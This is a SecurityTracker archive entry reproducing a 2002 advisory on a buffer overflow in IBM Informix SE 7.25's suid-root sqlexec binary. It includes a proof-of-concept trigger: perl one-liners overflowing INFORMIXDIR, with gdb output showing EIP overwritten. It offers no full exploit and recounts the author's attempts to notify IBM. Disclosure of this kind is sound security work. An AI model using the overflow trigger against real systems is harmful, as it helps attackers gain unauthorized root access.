SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Informix Vendors:   IBM
IBM Informix SE Database Buffer Overflow in Processing the 'INFORMIXDIR' Environment Variable May Allow Local Users to Obtain Root Privileges
SecurityTracker Alert ID:  1004420
SecurityTracker URL:  http://securitytracker.com/id/1004420
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 30 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): Informix SE-7.25
Description:   A vulnerability was reported in the IBM's Informix Standard Engine (SE). A local user may be able to obtain root level privileges in certain situations.

It is reported that a local user can trigger a buffer overflow in the processing of the INFORMIXDIR enviroment variable by setting the variable to a value with a size greater than 2023 bytes.

According to the report, the 'sqlexec' program is configured with set user id (suid) root privileges and set group id (sgid) 'informix' group privileges.

A demonstration exploit transcript is provided:

[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'`
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault

This overflow allows a local user to overwrite the EIP register and cause arbitrary code to be executed on the system with root level privileges.

The local user must, of course, have execute privileges for the /lib/sqlexec program.

The vendor has reportedly been notified. [Editor's note: Although IBM has apparently been notified, it appears that there may be a lack of sufficient internal communications within IBM and the part of IBM responsible for Informix may not have been notified.]

Impact:   A local user may be able to execute arbitrary code with root level privileges to gain root access on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www-3.ibm.com/software/data/informix/se/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any)

Message History:   None.


 Source Message Contents

Subject:  Informix SE-7.25 /lib/sqlexec Vulnerability


-----BEGIN PGP SIGNED MESSAGE-----





 Title:    Local Vulnerability in Informix SE-7.25
 Date:     21-04-2002
 Platform: Only tested in Linux but can be exported to others.
 Impact:   Users with exec perm over /lib/sqlexec can obtain euid=0 
 Author:   Juan Manuel Pascual Escriba <pask@uninet.edu>
 Status:   Vendor contacted details below.


PROBLEM SUMMARY:

    Buffer overflow exists if INFORMIXDIR enviroment variable is defined
with a size greater than 2023 bytes

[pask@dimoni lib]$ ls -FAlsc
total 2588
   4 drwxrwxr-x    2 informix informix     4096 May 28 22:50 boom/
1484 -rwsr-sr-x    1 root     informix  1515480 Apr 20 22:09 sqlexec*
 504 -rwxr-xr-x    1 informix informix   510283 Apr 20 22:09 sqlexecd*
 596 -rwxr-xr-x    1 informix informix   606041 Apr 20 22:09 sqlrm*

[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2023'` 
[pask@dimoni lib]$ ./sqlexec
[pask@dimoni lib]$ export INFORMIXDIR=`perl -e 'print "A"x2024'`
[pask@dimoni lib]$ ./sqlexec
Segmentation fault

[pask@dimoni lib]$ gdb ./sqlexec
(gdb) r
Starting program: /home/informix/SE-7.25/lib/./sqlexec
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
(gdb) info registers
...
esp            0x3fffed08       0x3fffed08
ebp            0x41414141       0x41414141
esi            0x3fffedf9       1073737209
edi            0x8191571        135861617
eip            0x41414141       0x41414141
...


IMPACT:
    Users with exec perm over /lib/sqlexec can obtain euid=0 
in a standard installation of Informix SE-7.25


EXPLOIT
    Will be available when IBM develops a patch.


STATUS
    At 21th April i tried to contact with IBM through 
http://www.ibm.com/contact,i received a quick answer 
telling me that i can email moreinfo@informix.com for 
report this vulnerability. This email address dont exist 
or is misconfigured (i received the message returned).

   At 28th May i tried to contact with IBM through 
askibm@vnet.ibm.com, they answer the email telling me 
"to call to Main support Line and choose option 3 to speak 
customer service representative who will be happy to assist 
me". 

I'm sorry but im not happy to pay an international call bill.
and im not a customer.


   Status of this advisory would be checked at:
	http://concepcion.upv.es/~pask/advisories


- --------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@uninet.edu






- -- 






		   "In god We Trust, Others We monitor"

	----------------------------------------------------------
			Juan Manuel Pascual Escriba
		     Midnight Systems & Security Manager
    	   PGP PubKey http://concepcion.upv.es/~pask/publica.pgp
	----------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQEVAwUBPPVlKDX3KWOaq4SJAQETqwf8DpQ8el1tEt/M8JA7r1xgzZdTPqrEVpRD
besDoryOU5xSRY1waGKILxqhm9G7/81+YGjhYLBB+KRkKTqK2LjWgrmu6/SyHLXW
hSJEoT4JjMT2rsJ1THNt8pglmqeMwAd8ncXZpSodWqByieQ6ly6uI1IcTSFViuAh
cvpc4Pk8zORELtNmFfnNRz93dEEnWo19odX7cx0tutqJUjosI0VfCX9kKs2iRjmM
5Fj1sGsTl1AHqcdJTmOzFQieA8ywFdS8vnEBuK6jqIHFc1Gn7e5c00K6Fu7ZFsZq
erx8tg7F93myY0wpq5AsYiiepgWUqLMyaeb1hjRiTn/X4F5eVHbtmg==
=4P/J
-----END PGP SIGNATURE-----


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC